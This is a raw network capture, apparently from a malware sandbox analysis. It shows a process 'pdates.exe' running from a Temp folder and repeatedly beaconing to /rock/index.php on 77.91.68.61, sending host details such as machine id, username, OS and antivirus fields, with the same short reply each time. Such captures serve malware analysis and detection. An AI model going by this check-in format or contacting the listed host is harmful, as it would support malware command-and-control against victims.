Jul 27, 2023 01:36:05.136571884 CEST	5845	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:36:05.186814070 CEST	5845	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:36:05 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
703	192.168.2.5	50425	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:36:05.335514069 CEST	5846	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:36:05.383905888 CEST	5846	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:36:05 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
704	192.168.2.5	50426	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:36:05.557595015 CEST	5847	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:36:05.606298923 CEST	5847	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:36:05 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
705	192.168.2.5	50427	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:36:05.759321928 CEST	5848	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:36:05.808446884 CEST	5848	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:36:05 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
706	192.168.2.5	50428	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:36:05.981034040 CEST	5848	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:36:06.029838085 CEST	5849	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:36:05 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
707	192.168.2.5	50429	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:36:06.181834936 CEST	5849	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:36:06.231075048 CEST	5850	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:36:06 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
708	192.168.2.5	50430	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:36:06.384794950 CEST	5850	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:36:06.433453083 CEST	5851	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:36:06 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
709	192.168.2.5	50431	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:36:06.602045059 CEST	5851	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:36:06.650234938 CEST	5852	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:36:06 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
71	192.168.2.5	49788	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:33:22.334162951 CEST	2915	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:33:22.382637978 CEST	2915	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:33:22 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
710	192.168.2.5	50432	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:36:06.803638935 CEST	5852	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:36:06.851582050 CEST	5853	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:36:06 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
711	192.168.2.5	50433	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:36:07.012154102 CEST	5853	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:36:07.061393976 CEST	5853	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:36:07 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
712	192.168.2.5	50434	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:36:07.237179995 CEST	5854	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:36:07.285938025 CEST	5854	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:36:07 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
713	192.168.2.5	50435	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:36:07.445719957 CEST	5855	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:36:07.494317055 CEST	5855	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:36:07 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
714	192.168.2.5	50436	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:36:07.650537968 CEST	5856	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:36:07.698895931 CEST	5856	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:36:07 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
715	192.168.2.5	50437	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:36:07.858002901 CEST	5857	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:36:07.905812025 CEST	5857	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:36:07 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
716	192.168.2.5	50438	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:36:08.054492950 CEST	5858	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:36:08.103075981 CEST	5858	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:36:08 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
717	192.168.2.5	50439	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:36:08.264956951 CEST	5859	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:36:08.313173056 CEST	5859	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:36:08 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
718	192.168.2.5	50440	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:36:08.487246037 CEST	5860	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:36:08.536488056 CEST	5860	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:36:08 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
719	192.168.2.5	50441	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:36:08.694000006 CEST	5861	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:36:08.744523048 CEST	5861	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:36:08 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
72	192.168.2.5	49789	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:33:22.573383093 CEST	2916	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:33:22.622298002 CEST	2916	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:33:22 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
720	192.168.2.5	50442	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:36:08.909714937 CEST	5862	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:36:08.958909988 CEST	5862	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:36:08 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
721	192.168.2.5	50443	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:36:09.125097036 CEST	5863	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:36:09.174734116 CEST	5863	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:36:09 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
722	192.168.2.5	50444	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:36:09.335751057 CEST	5864	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:36:09.383230925 CEST	5864	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:36:09 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
723	192.168.2.5	50445	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
